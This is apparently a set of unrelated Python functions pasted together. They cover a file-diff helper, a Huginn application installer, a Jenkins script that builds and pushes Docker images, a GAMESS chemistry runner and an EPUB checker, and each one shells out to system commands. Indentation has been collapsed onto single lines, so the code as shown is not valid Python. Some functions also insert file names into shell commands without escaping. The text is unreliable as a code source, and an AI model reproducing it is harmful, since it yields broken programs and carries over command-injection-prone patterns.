def show_differences(f1,f2): if not exists(f1): print('File does not exist, %s' % f1) elif not exists(f2): print('File does not exist, %s' % f2) elif differences(f1,f2): print(banner(f1.replace(src_dir()+'/', ''))) print(shell('diff %s %s' %(f1,f2))) else: print('No differences in %s and %s' % (f1, f2))
def install_app(): """ Performs application installation """ hookenv.log('Installing Huginn', 'info') # Configure NGINX vhost nginxlib.configure_site('default', 'vhost.conf', app_path=ruby_dist_dir()) # Update application huginnlib.download_archive() shell("mkdir -p %s/{log,tmp/pids,tmp/sockets}" % (ruby_dist_dir())) shell("cp %(dir)s/config/unicorn.rb.example " "%(dir)s/config/unicorn.rb" % {'dir': ruby_dist_dir()}) bundle("install --deployment --without development test") procfile = path.join(hookenv.charm_dir(), 'templates/Procfile') shell("cp %(procfile)s %(dir)s/Procfile" % { 'procfile': procfile, 'dir': ruby_dist_dir() }) bundle("exec rake assets:precompile RAILS_ENV=production") host.service_restart('nginx') hookenv.status_set('active', 'Huginn is installed!')
def run(): try: # Read CL arguments parser = argparse.ArgumentParser() parser.add_argument('repository', help='Repository of the built image, e.g. timmy/testy_image') parser.add_argument('-p', '--port', help='Port in docker configuration for the daemon. Defaulted to :4243.', type=int, default=4243) parser.add_argument('-w', '--workspace', help='Location of project with Dockerfile at its root. Defaulted to $WORKSPACE.', default=os.getenv('WORKSPACE')) parser.add_argument('-t', '--tag', help='Tag for the image. Defaulted to y-m-d-h-m-s (now).', default=datetime.now().strftime('%Y-%m-%d-%H-%M-%S')) parser.add_argument('-cp', '--config_path', help='Path to the docker config file. Default is /home/jenkins/.dockercfg', default='/home/jenkins/.dockercfg') # Look up gateway IP for docker daemon code, lines = shell("netstat -nr | grep '^0\.0\.0\.0' | awk '{print $2}'") assert code == 0, 'failure to lookup our gateway IP ?' host = lines[0] #assert host != '', 'Could not find gateway IP' args = parser.parse_args() repo = args.repository print "Repository set to {0}".format(repo) port = args.port host = "{0}:{1}".format(host, port) print "Daemon host set to {0}".format(host) workspace = args.workspace assert os.getenv('WORKSPACE') != '', 'No $WORKSPACE environment variable. Are you calling this from the Jenkins master?' print "Workspace set to {0}".format(workspace) tag = args.tag print "Tag set to {0}".format(tag) config_path = args.config_path print "Path to docker config set to {0}".format(config_path) authenticator = Authenticator() # Enter workflow below build(workspace, host, repo, tag, authenticator=authenticator) push(host, repo, tag, authenticator=authenticator) return 0 except Exception as e: print e return 1
def src_diff(args): if args: f1 = join(src_dir(), args[0]) f2 = join(src_base(), args[0]) show_differences(f1, f2) else: for f1 in list_source_files(src_dir()): f2 = f1.replace(src_dir(), src_base()) if exists(f1) and exists(f2): diff = differences(f1,f2) if diff: print(banner(f1.replace(src_dir()+'/', ''))) print(shell('diff %s %s' %(f1,f2)))
def calculate(filename, folder="./", store_output=True): """ Use GAMESS shell and calculate """ logfile = filename.replace(".inp", ".log") cmd = __rungms__ + " " + filename if store_output: cmd += " > " + folder + logfile stdout, stderr = shell.shell(cmd, shell=True) return stdout, stderr
def check(self): "Checks EPUB integrity" config = self.load_config() if not check_dependency_epubcheck(): sys.exit(error('Unavailable command.')) epub_file = u"%s.epub" % config['fileroot'] epub_path = join(CWD, 'build', epub_file) print success("Starting to check %s..." % epub_file) epubcheck = u'epubcheck %s' % epub_path epubcheck = shell(epubcheck.encode()) for line in epubcheck.errors(): print error(line) for line in epubcheck.output(): print line